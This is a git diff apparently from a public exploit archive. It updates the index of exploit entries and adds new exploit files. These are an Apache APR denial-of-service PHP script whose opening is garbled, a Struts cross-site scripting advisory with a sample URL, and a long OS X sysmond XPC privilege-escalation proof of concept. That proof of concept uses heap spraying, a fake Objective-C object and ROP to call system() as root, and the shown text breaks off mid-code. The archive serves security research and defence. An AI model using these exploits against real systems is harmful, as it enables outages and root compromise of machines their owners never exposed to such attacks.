Vulnerability",2009-09-03,Intevydis,multiple,remote,0 33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0 33212,platforms/windows/remote/33212.rb,"Adobe Flash Player Integer Underflow Remote Code Execution",2014-05-06,metasploit,windows,remote,0 @@ -30221,7 +30221,7 @@ id,file,description,date,author,platform,type,port 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection Vulnerability",2010-01-18,indoushka,php,webapps,0 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - (.slk) NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0 -33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 +33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0 @@ -30854,7 +30854,7 @@ id,file,description,date,author,platform,type,port 34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34254,platforms/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps,0 34255,platforms/php/webapps/34255.html,"cPanel 11.25 - Cross-Site Request Forgery Vulnerability",2010-07-03,G0D-F4Th3r,php,webapps,0 -34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-07-05,"John Leitch",php,webapps,0 +34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-07-05,"John Leitch",php,webapps,0 34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional Multiple Cross-Site Scripting Vulnerabilities",2010-07-06,"Ivan Sanchez",php,webapps,0 34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Parameter Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 @@ -31020,7 +31020,7 @@ id,file,description,date,author,platform,type,port 34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution Vulnerability",2010-08-12,"Giorgio Fedon",jsp,webapps,0 34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection Vulnerability",2010-05-13,"Giorgio Fedon",php,webapps,0 -34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability",2009-09-19,the_Edit0r,windows,dos,0 +34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability",2009-09-19,the_Edit0r,windows,dos,0 34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 34444,platforms/php/webapps/34444.txt,"RSSMediaScript 'index.php' Cross-Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0 @@ -31096,7 +31096,7 @@ id,file,description,date,author,platform,type,port 34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 -34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 +34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0 @@ -31192,7 +31192,7 @@ id,file,description,date,author,platform,type,port 34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0 -34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0 +34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 - Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0 34642,platforms/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Parameter Cross-Site Scripting Vulnerability",2009-08-06,"599eme Man",php,webapps,0 34643,platforms/php/webapps/34643.txt,"Silurus Classifieds category.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 @@ -31357,7 +31357,7 @@ id,file,description,date,author,platform,type,port 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446 34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0 -34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0 +34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0 34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0 34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0 34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross-Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0 @@ -31478,7 +31478,7 @@ id,file,description,date,author,platform,type,port 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0 34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0 -34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 +34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass Vulnerability",2010-11-02,"Nick Freeman",multiple,remote,0 34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability",2009-05-11,root@80sec.com,php,remote,0 34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection Vulnerability",2010-11-02,VSN,php,webapps,0 @@ -31755,7 +31755,7 @@ id,file,description,date,author,platform,type,port 35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 -35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0 +35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0 35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0 35259,platforms/php/webapps/35259.txt,"PivotX 2.2 pivotx/includes/blogroll.php color Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0 @@ -31862,7 +31862,7 @@ id,file,description,date,author,platform,type,port 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service Vulnerability",2011-02-22,"Luigi Auriemma",multiple,dos,0 35370,platforms/linux/local/35370.c,"Linux Kernel - libfutex - Local Root for RHEL/CentOS 7.0.1406",2014-11-25,"Kaiqu Chen",linux,local,0 35371,platforms/php/webapps/35371.txt,"Wordpress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 -35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 +35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting Vulnerability",2011-02-22,"High-Tech Bridge SA",php,webapps,0 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting Vulnerability",2011-02-22,andrew,php,webapps,0 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0 @@ -32189,5 +32189,13 @@ id,file,description,date,author,platform,type,port 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass Vulnerability",2011-05-09,@drk1wi,multiple,remote,0 35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35731,platforms/php/remote/35731.rb,"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80 +35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 +35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0 +35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 +35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 +35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 +35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0 +35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 +35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0 +35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 diff --git a/platforms/linux/dos/35738.php b/platforms/linux/dos/35738.php new file mode 100755 index 000000000..b392b4d8d --- /dev/null +++ b/platforms/linux/dos/35738.php @@ -0,0 +1,77 @@ +source: http://www.securityfocus.com/bid/47820/info + +Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. + +Apache APR versions prior to 1.4.4 are vulnerable. + +\n"; + else { + $out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n"; + $out .= "Host: ".$localhost."\r\n"; + $out .= "Connection: Close\r\n\r\n"; + fwrite($fp, $out); + fclose($fp); + } +} + +?> + + diff --git a/platforms/multiple/remote/35735.txt b/platforms/multiple/remote/35735.txt new file mode 100755 index 000000000..f4047af11 --- /dev/null +++ b/platforms/multiple/remote/35735.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47784/info + +Apache Struts is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Successful exploitation requires 'Dynamic Method Invocation' to be enabled by default. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Apache Struts versions 2.0.0 through 2.2.1.1 are vulnerable. + +http://www.example.com/struts2-blank/home.action!login:cantLogin=some_value \ No newline at end of file diff --git a/platforms/osx/local/35742.c b/platforms/osx/local/35742.c new file mode 100755 index 000000000..2461597fd --- /dev/null +++ b/platforms/osx/local/35742.c @@ -0,0 +1,395 @@ +/* + Source: https://code.google.com/p/google-security-research/issues/detail?id=121 +*/ + +/* + tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions! + + this poc uses liblorgnette to resolve some private symbols; grab the code from github: + git clone https://github.com/rodionovd/liblorgnette.git + + build this PoC with: + clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation + + sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".) + + sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function + allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary: + + ;read a uint64 with the key "Type" +__text:0000000100003144 mov rax, cs:_SYSMON_XPC_KEY_TYPE_ptr +__text:000000010000314B mov rsi, [rax] +__text:000000010000314E mov rdi, r14 +__text:0000000100003151 call _xpc_dictionary_get_uint64 +__text:0000000100003156 mov [rbx+20h], rax ;rbx points to sysmond_request + + ;read anything with the key "Attributes" +__text:000000010000315A mov rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr +__text:0000000100003161 mov rsi, [rax] +__text:0000000100003164 mov rdi, r14 +__text:0000000100003167 call _xpc_dictionary_get_value +__text:000000010000316C mov [rbx+28h], rax +... continues parsing more fields + + The sysmond_request is returned from this function and passed as the first argument to sub_10000337D: + +__text:000000010000337D sub_10000337D proc near ; CODE XREF: sub_100001AAF+4Bp +__text:000000010000337D +__text:000000010000337D var_38 = qword ptr -38h +__text:000000010000337D var_30 = dword ptr -30h +__text:000000010000337D var_2C = dword ptr -2Ch +__text:000000010000337D var_28 = qword ptr -28h +__text:000000010000337D var_20 = qword ptr -20h +__text:000000010000337D var_18 = qword ptr -18h +__text:000000010000337D +__text:000000010000337D push rbp +__text:000000010000337E mov rbp, rsp +__text:0000000100003381 push r14 +__text:0000000100003383 push rbx +__text:0000000100003384 sub rsp, 30h +__text:0000000100003388 mov rbx, rdi ; sysmond_request pointer +__text:000000010000338B mov rdi, [rbx+20h] ; "Type" uint64 value in the xpc request dictionary +__text:000000010000338F mov rsi, [rbx+28h] ; "Attributes" value in the xpc request dictionary +__text:0000000100003393 call sub_100003454 + + this function extracts the Type and Attribute values and passes them to sub_100003454: + +__text:0000000100003454 sub_100003454 proc near ; CODE XREF: sub_10000337D+16p +__text:0000000100003454 ; handler+C0 p +__text:0000000100003454 push rbp +__text:0000000100003455 mov rbp, rsp +__text:0000000100003458 push r15 +__text:000000010000345A push r14 +__text:000000010000345C push r12 +__text:000000010000345E push rbx +__text:000000010000345F mov r12, rsi ; this is "Attributes" value +__text:0000000100003462 mov r14, rdi ; which was read from the dictionary with xpc_dictionary_get_value +__text:0000000100003465 mov rdi, r12 ; meaning it could be any xpc type +__text:0000000100003468 call _xpc_data_get_length ; use "Attributes" value as an xpc_data object +__text:000000010000346D mov r15, rax +__text:0000000100003470 mov rdi, r15 ; size_t +__text:0000000100003473 call _malloc +__text:0000000100003478 mov rbx, rax +__text:000000010000347B mov rdi, r12 +__text:000000010000347E mov rsi, rbx +__text:0000000100003481 xor edx, edx +__text:0000000100003483 mov rcx, r15 +__text:0000000100003486 call _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data + + the xpc_data_get_bytes call is the interesting one: + +__text:00000000000114BE _xpc_data_get_bytes proc near +__text:00000000000114BE push rbp +__text:00000000000114BF mov rbp, rsp +... +__text:00000000000114D2 mov r14, rsi +__text:00000000000114D5 mov r13, rdi +__text:00000000000114D8 cmp qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh +__text:00000000000114DD jnz short loc_11515 +... +__text:0000000000011515 lea rdi, [r13+28h] ; predicate +__text:0000000000011519 lea rdx, __xpc_data_map_once ; function +__text:0000000000011520 mov rsi, r13 ; context +__text:0000000000011523 call _dispatch_once_f + + here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once: + +__text:00000000000028E9 __xpc_data_map_once proc near ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo +__text:00000000000028E9 ; __xpc_data_equal+46ao ... +__text:00000000000028E9 push rbp +__text:00000000000028EA mov rbp, rsp +__text:00000000000028ED push r14 +__text:00000000000028EF push rbx +__text:00000000000028F0 mov rbx, rdi ; controlled xpc object +__text:00000000000028F3 cmp byte ptr [rbx+48h], 0 ; if the byte at +48h is 0 +__text:00000000000028F7 jnz short loc_291E +__text:00000000000028F9 mov rdi, [rbx+30h] ; then pass the pointer at +30h +__text:00000000000028FD lea rsi, [rbx+38h] +__text:0000000000002901 lea rdx, [rbx+40h] +__text:0000000000002905 call _dispatch_data_create_map ; to dispatch_data_create_map +__text:000000000000290A mov r14, rax +__text:000000000000290D mov rdi, [rbx+30h] ; object +__text:0000000000002911 call _dispatch_release ; and then to dispatch_release + + we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0: + +__text:00000000000012B6 _dispatch_data_create_map proc near ; CODE XREF: __dispatch_data_subrange_map+34p +__text:00000000000012B6 ; __dispatch_operation_perform+DEap +__text:00000000000012B6 +__text:00000000000012B6 push rbp +__text:00000000000012B7 mov rbp, rsp +__text:00000000000012BA push r15 +__text:00000000000012BC push r14 +__text:00000000000012BE push r13 +__text:00000000000012C0 push r12 +__text:00000000000012C2 push rbx +__text:00000000000012C3 sub rsp, 38h +__text:00000000000012C7 mov [rbp+var_58], rdx +__text:00000000000012CB mov r15, rsi +__text:00000000000012CE mov r14, rdi +__text:00000000000012D1 mov r12, [r14+28h] ; if this is 0 +__text:00000000000012D5 test r12, r12 +__text:00000000000012D8 jz short loc_131C ; jumps to early return without disturbing anything else + + we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object) + this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object. + + We'll come back to how to get code code execution from that later. + + The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object and the gets + passed to functions expecting an xpc_data. In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value + in the request dictionary - specifically one where the offsets outlined above have suitably controlled values: + + +28h qword 0 + +30h pointer to controlled data + +48h byte 0 + + the xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h so the first two constraints are easily + satisfied. Heap spraying is very reliable and fast in xpc, we can easily map a gigabyte of data into sysmond at a predicable address so we can point the + pointer at +30h to that. + + The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h which must be 0... + + OS X uses magazine malloc which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k15k = large) and within these + it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline-metadata which means there's a + reasonable expectation that sequential allocations of similar sizes will be contiguous. + + Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing which is allocated? + xpc_dictionaries have 6 hash buckets which store the heads of linked-lists for each bucket. As the dictionary is being deserialized first the value of a + key is deserialized (allocating in this case the xpc_uuid) object then the entry is added to the linked-list (allocting a new linked-list entry struct.) + + The structure of a linked-list entry is approximately: + + struct ll { + struct ll* forward; + struct ll* backward; + xpc_object_t* object; + uint64_t flags; + char key[0]; + } + + This is a variable-size struct - the key is allocated inline. If the xpc_uuid is immediately followed in memory by its linked-list entry the the value at +48 + will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that + the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes. + The magazine malloc "small" size class heap chunks all have an alignment + of 512 bytes meaning that we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k. In order for the key to end up in the right linked-list + when it's deserialized we also need to make sure that the long key hashes to the same hash as "Attributes" - since there are only 6 possible hash values this is trivial. + + Finally, we can add another xpc_data object to the reqest dictionary with a gigabyte of heapspray as the value - this will be mapped into sysmond at a suitably + predictable address meaning we can set the high 8 bytes of the uuid value to point to this. + + At this point we control a pointer to an objective-c object and the code will call objc_msgSend to "send a message" to our controlled object, which is the + objective-c paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control: + +__text:000000000000117F __dispatch_objc_release proc near ; CODE XREF: _dispatch_release:loc_117Aj +__text:000000000000117F ; _dispatch_data_create_subrange+183_p ... +__text:000000000000117F mov rax, rdi +__text:0000000000001182 cmp cs:__os_object_have_gc, 0 +__text:0000000000001189 jnz short loc_119E +__text:000000000000118B mov rcx, cs:msgRef_release__objc_msgSend_fixup +__text:0000000000001192 lea rsi, msgRef_release__objc_msgSend_fixup +__text:0000000000001199 mov rdi, rax +__text:000000000000119C jmp rcx + + + rdi points to our heap sprayed fake objective-c object. This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure then calls the value at that address + which is objc_msgSend_fixup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment and in lldb we can see that at runtime is has the following + contents: + + { /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" } + + and the implementation of objc_msgSend_fixedup is: + +(lldb) disassemble --name objc_msgSend_fixedup +libobjc.A.dylib`objc_msgSend_fixedup: + 0x7fff91d5d1c4: mov RSI, QWORD PTR [RSI + 8] + 0x7fff91d5d1c8: jmpq 0x7fff91d5d080 ; objc_msgSend + + which just calls through to objc_msgSend passing the address of the "release" string as the second argument: + +(lldb) disassemble --name objc_msgSend +libobjc.A.dylib`objc_msgSend: + 0x7fff91d5d080: test RDI, RDI + 0x7fff91d5d083: je 0x7fff91d5d0f8 + 0x7fff91d5d086: test DIL, 1 + 0x7fff91d5d08a: jne 0x7fff91d5d10f + 0x7fff91d5d091: mov R11, QWORD PTR [RDI] ; rdi points to controlled fake objective-c object - read pointer to objective-c class + 0x7fff91d5d094: mov R10, RSI ; copy selector (pointer to string of method to call) to r10 + 0x7fff91d5d097: and R10D, DWORD PTR [R11 + 24] ; mask off n upper bits of the pointer according to value of fake_class+18h + 0x7fff91d5d09b: shl R10, 4 ; + 0x7fff91d5d09f: add R10, QWORD PTR [R11 + 16] ; use that masked off value as an index into a cache array pointed to by fake_class+10h + 0x7fff91d5d0a3: cmp RSI, QWORD PTR [R10] ; does the cache entry selector match the selector passed as the second arg? + 0x7fff91d5d0a6: jne 0x7fff91d5d0ac + 0x7fff91d5d0a8: jmp QWORD PTR [R10 + 8] ; if so, then call the cached function implementation address + + Objective-c classses cache the addresses of the selector strings, not the contents of the strings so in order to exploit this we need to be able + to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache. + All these libraries are loaded at the same address in all processes so we can just find the selector address in this process and it'll be valid for sysmond. + + Having done this we get instruction pointer control. At this point rax and rdi point to the heap spray so this PoC uses a pivot gadget in CoreFoundation + to move the stack to point into the heap spray and ROP to a system() call with controlled string :) +*/ + + +#include +#include +#include +#include +#include +#include + +#include +#include + +#include +#include +#include + +#include + +#include "liblorgnette/lorgnette.h" + +/* find the base address of CoreFoundation for the ROP gadgets */ + +void* find_library_load_address(const char* library_name){ + kern_return_t err; + + // get the list of all loaded modules from dyld + // the task_info mach API will get the address of the dyld all_image_info struct for the given task + // from which we can get the names and load addresses of all modules + task_dyld_info_data_t task_dyld_info; + mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; + err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count); + + const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr; + const struct dyld_image_info* image_infos = all_image_infos->infoArray; + + for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){ + const char* image_name = image_infos[i].imageFilePath; + mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress; + if (strstr(image_name, library_name)){ + return (void*)image_load_address; + } + } + return NULL; +} + + +struct heap_spray { + void* fake_objc_class_ptr; // -------+ + uint8_t pad0[0x10]; // | + uint64_t first_gadget; // | + uint8_t pad1[0x8]; // | + uint64_t null0; // | + uint64_t pad3; // | + uint64_t pop_rdi_rbp_ret; // | + uint64_t rdi; // | + uint64_t rbp; // | + uint64_t system; // | + struct fake_objc_class_t { // | + char pad[0x10]; // <----------+ + void* cache_buckets_ptr; //--------+ + uint64_t cache_bucket_mask; // | + } fake_objc_class; // | + struct fake_cache_bucket_t { // | + void* cached_sel; // <--------+ //point to the right selector + void* cached_function; // will be RIP :) + } fake_cache_bucket; + char command[256]; +}; + + +int main(){ + // create the XPC connection to sysmond + xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.sysmond", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); + + xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { + xpc_type_t t = xpc_get_type(event); + if (t == XPC_TYPE_ERROR){ + printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); + } + printf("received an event\n"); + }); + xpc_connection_resume(conn); + + xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); + + + + void* heap_spray_target_addr = (void*)0x120202000; + struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0); + memset(hs, 'C', 0x1000); + hs->null0 = 0; + hs->fake_objc_class_ptr = &hs->fake_objc_class; + 